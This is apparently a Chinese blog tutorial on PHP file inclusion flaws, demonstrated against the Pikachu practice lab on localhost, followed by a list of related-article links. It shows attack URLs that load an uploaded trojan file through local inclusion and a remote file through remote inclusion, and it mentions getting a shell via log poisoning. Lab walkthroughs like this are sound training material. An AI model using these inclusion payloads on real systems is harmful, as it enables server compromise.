文件包含漏洞

概述:

文件包含有本地文件包含(loacl) 和 **远程文件包含(remote)**两种

**本地文件包含:**文件上传本地后通过文件包含漏洞直接解析

**远程文件包含:**远程请求服务(公网)

**概括:**文件包含漏洞其实就是开发语言内置了文件包含函数,有的文件包含的代码被设置成了通过前端传入的变量,在网站没有做充分的安全校验下,攻击者可以读取服务器敏感文件、在日志写入getshell通过文件包含访问,配合文件上传等(访问即被解析)

现在用pikachu演示(PHP5.5)

本地文件包含:

用1.txt表示我已经上传的木马,现在用文件包含访问解析:

复制代码
http://127.0.0.1/pikachu-master/vul/fileinclude/fi_local.php?filename=1.txt&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

将1.txt后缀改为1.png

复制代码
http://127.0.0.1/pikachu-master/vul/fileinclude/fi_local.php?filename=1.png&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

后缀改为php

复制代码
http://127.0.0.1/pikachu-master/vul/fileinclude/fi_local.php?filename=1.php&submit=提交查询

远程文件包含:

首先将php.ini的allow_url_include改为ON

在phpstuduy(模拟远程)放一个一句话木马然后通过远程文件包含访问

上传我写的一句话木马,访问:

复制代码
http://127.0.0.1/pikachu-master/vul/fileinclude/fi_remote.php?filename=http://127.0.0.1/pikachu-master/info.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
相关推荐
小五传输1 小时前
Serv-U替代方案怎么选?政务机关文件安全传输对比与迁移指南
大数据·运维·安全
其实防守也摸鱼1 小时前
红队技能总结导图:从入门到精通的完整知识体系
开发语言·人工智能·学习·安全·web安全
zjnlswd1 小时前
C# 学习笔记
笔记·学习
远离UE41 小时前
UE5 显存 虚拟内存 深入学习笔记
笔记·学习·ue5
HY小宝F2 小时前
从 APP 层打穿到传感器:树莓派 FFmpeg 底层学习笔记(一)V4L2/ALSA 踩坑与认知重构
笔记·学习·ffmpeg
向上的车轮2 小时前
GitHub开源破圈方法论:一个小白的实战成长笔记
笔记·开源·github
不会代码的小猴2 小时前
4. 控件学习2
开发语言·c++·笔记·qt
山东科恩光电2 小时前
折弯机保护装置在生产安全和效率提升中的应用及优势分析
安全
一条泥憨鱼3 小时前
【从0开始学习计算机网络】| CA证书、数字签名与中间人攻击:一次完整的安全握手之旅
计算机网络·安全·http·https